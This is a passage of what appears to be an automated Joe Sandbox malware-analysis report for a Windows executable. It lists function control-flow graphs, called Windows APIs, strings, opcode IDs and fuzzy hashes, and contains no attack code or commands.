                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Value$HeapPath$AllocCriticalErrorLastQuoteSectionSpaces$BackslashCharCreateEnterEnvironmentFileFreeHandleLeaveModuleNameRemoveTempThreadUpperVariablewcslen
                                                              • String ID:
                                                              • API String ID: 2499486723-0
                                                              • Opcode ID: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
                                                              • Instruction ID: 5e2f233be3bb1e1a489454234068146e28d45b36aeb09ace1181e30b51997f55
                                                              • Opcode Fuzzy Hash: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
                                                              • Instruction Fuzzy Hash: 6C722BB6E25548D6EA16B7B7B8877E95220A3AD394F500411FF4C0B363EE39C5F64B10

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FilePointermemmove
                                                              • String ID:
                                                              • API String ID: 2366752189-0
                                                              • Opcode ID: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                                              • Instruction ID: b9f44d82ba4cb6c24f152d63ce96d8852f082d92484b54d7365d071901ec84b9
                                                              • Opcode Fuzzy Hash: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                                              • Instruction Fuzzy Hash: 7541837770468086DB01CF7AF1402ADF7A4EB98BD9F084426EF4C43BA5DA39C591CB50

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 509 14000e3f0-14000e404 510 14000e4f3-14000e4fd 509->510 511 14000e40a-14000e40e 509->511 511->510 512 14000e414-14000e418 511->512 513 14000e483-14000e4a6 call 14000e770 512->513 514 14000e41a-14000e423 512->514 521 14000e4a8-14000e4b5 513->521 522 14000e4ee 513->522 516 14000e451-14000e45b 514->516 517 14000e425 514->517 516->516 518 14000e45d-14000e482 WriteFile 516->518 520 14000e430-14000e43a 517->520 520->520 523 14000e43c-14000e450 call 14000e620 520->523 524 14000e4c5-14000e4d6 WriteFile 521->524 525 14000e4b7-14000e4ba call 14000e620 521->525 522->510 528 14000e4dc-14000e4e8 HeapFree 524->528 530 14000e4bf-14000e4c3 525->530 528->522 530->528
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$FreeHeap
                                                              • String ID:
                                                              • API String ID: 74418370-0
                                                              • Opcode ID: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                                              • Instruction ID: 9d08b72cfe526555b527e3d6fc60fa1eae748afb3cf0625e1a419d858907832f
                                                              • Opcode Fuzzy Hash: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                                              • Instruction Fuzzy Hash: 43317EB2205A8082EB22DF16E0453A9B7B0F789BD4F548515EB59577F4DF3EC488CB00

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 531 14000e770-14000e7b7 WideCharToMultiByte 532 14000e7b9-14000e7d6 HeapAlloc 531->532 533 14000e81f-14000e822 531->533 534 14000e804 532->534 535 14000e7d8-14000e801 WideCharToMultiByte 532->535 536 14000e809-14000e81e 533->536 534->536 535->534
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocHeap
                                                              • String ID:
                                                              • API String ID: 3475569825-0
                                                              • Opcode ID: 49eb562b8cb434ff95f7e7d63f5ecf434c56baadcc58e4f799a86c336de5446e
                                                              • Instruction ID: ae5164d7e213c5423ce426761272d4060c1fe25f0e8d52ef4d31f29a04fa76ea
                                                              • Opcode Fuzzy Hash: 49eb562b8cb434ff95f7e7d63f5ecf434c56baadcc58e4f799a86c336de5446e
                                                              • Instruction Fuzzy Hash: D9112B72615B8082E754DF26B84435AB7A5FBC8BD0F148228EF9D63BA4DF38C5229704

                                                              Control-flow Graph

                                                              • Function 14000d914 (basic blocks 14000d914-14000d9a8): calls wcsncpy, wcslen and CreateDirectoryW
                                                              APIs
                                                              Similarity
                                                              • API ID: CreateDirectorywcslenwcsncpy
                                                              • String ID:
                                                              • API String ID: 961886536-0
                                                              • Opcode ID: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                                              • Instruction ID: 5f5e6732187473c7e9a992da28a106256b0abf82a063e4d7cd37b44a9c7c83f6
                                                              • Opcode Fuzzy Hash: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                                              • Instruction Fuzzy Hash: 100188A621264191EF72DB65E0643E9B350F78C7C4F804523FB8D036A8EE3DC645CB14

                                                              Control-flow Graph

                                                              • Function 14000b538 (basic block 14000b538-14000b573): calls memset, InitCommonControlsEx and CoInitialize
                                                              APIs
                                                              Similarity
                                                              • API ID: CommonControlsInitInitializememset
                                                              • String ID:
                                                              • API String ID: 2179856907-0
                                                              • Opcode ID: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                                              • Instruction ID: 449a974473b47bcf77cc2e9d1d873e7016711834fb404a36d393ff203d460c1f
                                                              • Opcode Fuzzy Hash: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                                              • Instruction Fuzzy Hash: E0E0E27263658092E785EB22E8857AEB260FB88748FC06105F38B469A5CF3DC659CF00

                                                              Control-flow Graph

                                                              APIs
                                                              Similarity
                                                              • API ID: AllocHeap$Value
                                                              • String ID:
                                                              • API String ID: 3898337583-0
                                                              • Opcode ID: 8fb7bdff1a5ea7f5a6416ebb7e65581105b868b3e6afb08efbefc70494558fec
                                                              • Instruction ID: 13d1d2221b5dfffbe944c94766c5cf34ad854dcf92a9a233d77868c63a58341b
                                                              • Opcode Fuzzy Hash: 8fb7bdff1a5ea7f5a6416ebb7e65581105b868b3e6afb08efbefc70494558fec
                                                              • Instruction Fuzzy Hash: BA21A336609B40C6DA21CB5AE89136AB7A1F7CDBD4F108126EB8D87B38DF3DC5518B00

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: CodeExitProcess
                                                              • String ID: open
                                                              • API String ID: 3861947596-2758837156
                                                              • Opcode ID: b7feb277e73c6429ec278226bbe6df587e3a7ad8db4220ec3f4f0566a99c26d5
                                                              • Instruction ID: e85bff13557fc8eee7e7e221a0258bb1a2e766680f88975b06e903b36e14beee
                                                              • Opcode Fuzzy Hash: b7feb277e73c6429ec278226bbe6df587e3a7ad8db4220ec3f4f0566a99c26d5
                                                              • Instruction Fuzzy Hash: 44315E73A19A84D9DA619B6AF8417EE6364F388784F404415FF8D07B6ADF3CC2958B40

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0000000140012060: HeapCreate.KERNEL32 ref: 000000014001206E
                                                                • Part of subcall function 0000000140012060: TlsAlloc.KERNEL32 ref: 000000014001207B
                                                                • Part of subcall function 000000014000C980: HeapCreate.KERNEL32 ref: 000000014000C98E
                                                                • Part of subcall function 000000014000B538: memset.MSVCRT ref: 000000014000B547
                                                                • Part of subcall function 000000014000B538: InitCommonControlsEx.COMCTL32 ref: 000000014000B561
                                                                • Part of subcall function 000000014000B538: CoInitialize.OLE32 ref: 000000014000B569
                                                                • Part of subcall function 00000001400120D0: HeapAlloc.KERNEL32 ref: 0000000140012123
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD11
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD42
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CDB2
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D56E
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D58F
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D5A1
                                                                • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D476
                                                                • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D491
                                                                • Part of subcall function 0000000140011D30: HeapAlloc.KERNEL32 ref: 0000000140011D82
                                                                • Part of subcall function 0000000140011D30: memset.MSVCRT ref: 0000000140011DB6
                                                                • Part of subcall function 00000001400120D0: HeapReAlloc.KERNEL32 ref: 0000000140012151
                                                                • Part of subcall function 00000001400120D0: HeapFree.KERNEL32 ref: 0000000140012194
                                                                • Part of subcall function 000000014000C4D0: RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000C8A5
                                                                • Part of subcall function 000000014000C4D0: AddVectoredExceptionHandler.KERNEL32 ref: 000000014000C8C0
                                                                • Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
                                                                • Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
                                                                • Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1
                                                                • Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
                                                                • Part of subcall function 0000000140012210: HeapAlloc.KERNEL32 ref: 0000000140012266
                                                              • HeapDestroy.KERNEL32 ref: 000000014000124C
                                                              • ExitProcess.KERNEL32 ref: 0000000140001258
                                                              Similarity
                                                              • API ID: Heap$Alloc$Free$CreateErrorExceptionHandlerLastValueVectoredmemset$CommonControlsDestroyExitInitInitializeProcessRemove
                                                              • String ID:
                                                              • API String ID: 1207063833-0
                                                              • Opcode ID: 06dbeff3fd86c6695b84df31992dbf02651ab7d441abcdbe23a8bedf592c97f1
                                                              • Instruction ID: 5ef5c56730dbad915fac233b77092dd37bc53bc4ec3343fa221c1b372e2f6746
                                                              • Opcode Fuzzy Hash: 06dbeff3fd86c6695b84df31992dbf02651ab7d441abcdbe23a8bedf592c97f1
                                                              • Instruction Fuzzy Hash: 9D510AF0A11A4081FA03F7A3F8527E926559B9D7D0F808119BF1D1B3F3DD3A86598B22

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00000001400123E0: TlsGetValue.KERNEL32 ref: 00000001400123F8
                                                              • RemoveDirectoryW.KERNEL32(00000000,?,0000000140003010), ref: 000000014000299C
                                                              • RemoveDirectoryW.KERNEL32(?,0000000140003010), ref: 00000001400029A8
                                                                • Part of subcall function 0000000140007170: WaitForSingleObject.KERNEL32 ref: 0000000140007187
                                                                • Part of subcall function 000000014000720C: TerminateThread.KERNEL32 ref: 0000000140007223
                                                                • Part of subcall function 000000014000720C: EnterCriticalSection.KERNEL32 ref: 0000000140007230
                                                              Similarity
                                                              • API ID: DirectoryRemove$CriticalEnterObjectSectionSingleTerminateThreadValueWait
                                                              • String ID:
                                                              • API String ID: 547990026-0
                                                              • Opcode ID: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
                                                              • Instruction ID: 7a41e47de86a43ff34abb2becfbad555fd020f9bfb046cc2ed969e3c0c855493
                                                              • Opcode Fuzzy Hash: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
                                                              • Instruction Fuzzy Hash: 0F01FFF5509B01E5F923BB63BC02BDA6B61E74E3E0F409405BB89131B3DE3DD9849610

                                                              Control-flow Graph

                                                              APIs
                                                              Similarity
                                                              • API ID: ExceptionHandlerVectored$Remove
                                                              • String ID:
                                                              • API String ID: 3670940754-0
                                                              • Opcode ID: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                                              • Instruction ID: 54ed52b0d94e107c171475cce83a86a7777a808cb3853d4771323e3d57a36066
                                                              • Opcode Fuzzy Hash: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                                              • Instruction Fuzzy Hash: 8AF0ED7061370485FE5BDB93B8987F472A0AB4C7C0F184029BB49076719F3C88A48348

                                                              Control-flow Graph

                                                              • Function 14000da6c (basic blocks 14000da6c-14000daa6): calls SetFileAttributesW and DeleteFileW
                                                              APIs
                                                              Similarity
                                                              • API ID: File$AttributesDelete
                                                              • String ID:
                                                              • API String ID: 2910425767-0
                                                              • Opcode ID: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                                              • Instruction ID: adf2a79140fabccb03c20fd21f07aa3af446659453137af282c5310bbe8ffc9f
                                                              • Opcode Fuzzy Hash: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                                              • Instruction Fuzzy Hash: 48E05BB471910195FB6BD7A778153F521419F8D7D1F184121AB42071B0EF3D44C55222
                                                              APIs
                                                              Similarity
                                                              • API ID: AllocHeap$CreateValue
                                                              • String ID:
                                                              • API String ID: 493873155-0
                                                              • Opcode ID: 9e0d5e764e4f7f0553988baf76ecb42ee58d508d85325be61ca51fd0dfb33207
                                                              • Instruction ID: 66307e28580f649ba8418ae6b9c958ace7f1b69875393c61862d084d03b91818
                                                              • Opcode Fuzzy Hash: 9e0d5e764e4f7f0553988baf76ecb42ee58d508d85325be61ca51fd0dfb33207
                                                              • Instruction Fuzzy Hash: 9ED0C939A1175092EB46AB72AC5A3E922A0F75C3C1F901819B70907775DF7E81956A00
                                                              APIs
                                                              Similarity
                                                              • API ID: DestroyFreeHeap
                                                              • String ID:
                                                              • API String ID: 3293292866-0
                                                              • Opcode ID: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
                                                              • Instruction ID: 71a10d3d5b3131d437c50284ad1bfb95f0c128dd24e11de8e9b8b88d768efc2d
                                                              • Opcode Fuzzy Hash: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
                                                              • Instruction Fuzzy Hash: 4CC04C34611400D2E606EB13EC953A42362B79C7C5F801414E70E1B671CE394955E700
                                                              APIs
                                                              Similarity
                                                              • API ID: Heap$AllocFreememset
                                                              • String ID:
                                                              • API String ID: 3063399779-0
                                                              • Opcode ID: edd241adf8553052784530922556135fb4408ba6f5c1699abdea0ec7c528a08c
                                                              • Instruction ID: 5c5c97092251ccb6e51d21bc2c296289ab600fd53c4e4fe069e69402a2a58e68
                                                              • Opcode Fuzzy Hash: edd241adf8553052784530922556135fb4408ba6f5c1699abdea0ec7c528a08c
                                                              • Instruction Fuzzy Hash: F7213B32601B5086EA1ADB53BC41799A6A8FBC8FD0F498025AF584BB66DE38C852C340
APIs
Memory Dump Source
• Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_WO.jbxd
Similarity
• API ID: AllocHeapValue
• String ID:
• API String ID: 2362848668-0
• Opcode ID: 5469319e057a9dc06414a52f1e9995086a4e4d267debc5f29e971f3f59de7243
• Instruction ID: d5031950f6f24f379c2142eebe898701a91e7a03f91a2b9bee16bac6c279ab43
• Opcode Fuzzy Hash: 5469319e057a9dc06414a52f1e9995086a4e4d267debc5f29e971f3f59de7243
• Instruction Fuzzy Hash: 2D219676609B44C6CB20CF5AE49025AB7A0F7CCBA8F144216EB8D43B78DF79C651CB40
APIs
Memory Dump Source
• Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_WO.jbxd
Similarity
• API ID: CloseFreeHandleHeap
• String ID:
• API String ID: 1642312469-0
• Opcode ID: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
• Instruction ID: 5f93da8337f86b39695cad05c5aa1bbbcf0731d39a623fe836b1511b3ba38e21
• Opcode Fuzzy Hash: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
• Instruction Fuzzy Hash: AD01FB71614A4081EA56EBA7F5543E96391ABCDBE0F445216BB2E4B7F6DE38C4808740
APIs
Memory Dump Source
• Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_WO.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
• Instruction ID: 85eb21683fd68773ec3f68e7974a7ba45b0d300be2a951898864618d3eded784
• Opcode Fuzzy Hash: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
• Instruction Fuzzy Hash: D4F030B6624694CBCB10DF39E00166977B0F349B48F200416EF4847764DB36C992CF10
APIs
Memory Dump Source
• Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_WO.jbxd
Similarity
• API ID: Free
• String ID:
• API String ID: 3978063606-0
• Opcode ID: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
• Instruction ID: 3be53cbf4efc602c07d04e61f546686734bccd281855bf9d316eb8d3f4bb89d6
• Opcode Fuzzy Hash: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
• Instruction Fuzzy Hash: E3D0E97091558096F66BA747EC857E422A2B7AC3C5F500419E3050B1B28ABE49DDEA15
APIs
Memory Dump Source
• Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_WO.jbxd
Similarity
• API ID: CurrentDirectory
• String ID:
• API String ID: 1611563598-0
• Opcode ID: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
• Instruction ID: d26b75307fbf4d2f65b3bf59e092d1c76b80437de534da0d48005b48f8adbafa
• Opcode Fuzzy Hash: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
• Instruction Fuzzy Hash: 74C09B74663002C1FA6A936328A97E451905B0C391F504511F7064117089BD14975530
APIs
Memory Dump Source
• Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_WO.jbxd
Similarity
• API ID: CreateHeap
• String ID:
• API String ID: 10892065-0
• Opcode ID: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
• Instruction ID: 2c080862c33f0b7fb519294060e944d109da0d65108c87cfa11e07f441f421b0
• Opcode Fuzzy Hash: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
• Instruction Fuzzy Hash: 40C02B34712690C2E3492323AC033991090F34C3C0FD02018F60102770CE3D80A70B00
APIs
Memory Dump Source
• Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_WO.jbxd
Similarity
• API ID: ExceptionHandlerRemoveVectored
• String ID:
• API String ID: 1340492425-0
• Opcode ID: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
• Instruction ID: 43e8ab96d0ef540813763e0684213002212cef3b8ee59004a75f8fb70944dace
• Opcode Fuzzy Hash: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
• Instruction Fuzzy Hash: 30C08C78B03B0085FA4AEB03B8883A422606B8C7C1F800008E60E037328E3C04A54780
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_WO.jbxd
Similarity
• API ID: Window$Message$CreateHeapSend$Freewcslen$Accelerator$LoadMetricsSystemTableTranslate$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundIconLongObjectRegisterStockwcscpy
• String ID: BUTTON$C$EDIT$P$STATIC$n
• API String ID: 9748049-1690119102
• Opcode ID: c01de26334065d18653497f5b45086f7b5809085fdd55da687512dab041c8858
• Instruction ID: f11a45e4f50ece19de517c67b98e9e797584e7b20c87343cc1d5b6865565d8d0
• Opcode Fuzzy Hash: c01de26334065d18653497f5b45086f7b5809085fdd55da687512dab041c8858
• Instruction Fuzzy Hash: 4DD134B5605B4086EB12DF62F8447AA77A5FB8CBC8F444129EB4A47B79DF7DC4098B00
Strings
Memory Dump Source
• Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_WO.jbxd
Similarity
• API ID:
• String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
• API String ID: 0-2665694366
• Opcode ID: 67ed6bfcabc3f0c0ebd438a55ac1e776d09ba86ed25bc9a2d2f07d297f59d07e
• Instruction ID: 94762fe19e52a1e76ee8dc23a2b1d827446cec64643fb03410c83a9544901dbd
• Opcode Fuzzy Hash: 67ed6bfcabc3f0c0ebd438a55ac1e776d09ba86ed25bc9a2d2f07d297f59d07e
• Instruction Fuzzy Hash: 9452D2726106608BE72ACF26D49CBED37E5F3487C4F414129EB868B7A4E77AC845CB50
Strings
Memory Dump Source
• Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_WO.jbxd
Similarity
• API ID:
• String ID: $header crc mismatch$unknown compression method$unknown header flags set
• API String ID: 0-4074041902
• Opcode ID: 63d14d99d44cc3d14528aba0519c32bd687ffcf0a398d873a188d18be175c855
• Instruction ID: dac418b812a3de41c7c7b5072b67fa498c356b49e4a588b682982c80ed946ec6
• Opcode Fuzzy Hash: 63d14d99d44cc3d14528aba0519c32bd687ffcf0a398d873a188d18be175c855
• Instruction Fuzzy Hash: 4DF19C726007508BEB268F1AC48CBAE3BE6F7487C8F064519EF8A4B7A4DB76C555C740
Strings
Memory Dump Source
• Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_WO.jbxd
Similarity
• API ID:
• String ID: invalid distance code$invalid distance too far back$invalid literal/length code
• API String ID: 0-3255898291
• Opcode ID: 1e45c625052aaed0026cb6e9d9d155a9553cb1c11e4068b20b0b3ed65267e05e
• Instruction ID: 36a5a67a6b198623208e03fcdf44eed6b32d9d42851390dc4c2f02830f1e2460
• Opcode Fuzzy Hash: 1e45c625052aaed0026cb6e9d9d155a9553cb1c11e4068b20b0b3ed65267e05e
• Instruction Fuzzy Hash: 17D11733618AD08BD71A8F7AD8443AD7BA1F3597C1F048116FB968B7D1DA3ACA49C700
Strings
Memory Dump Source
• Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
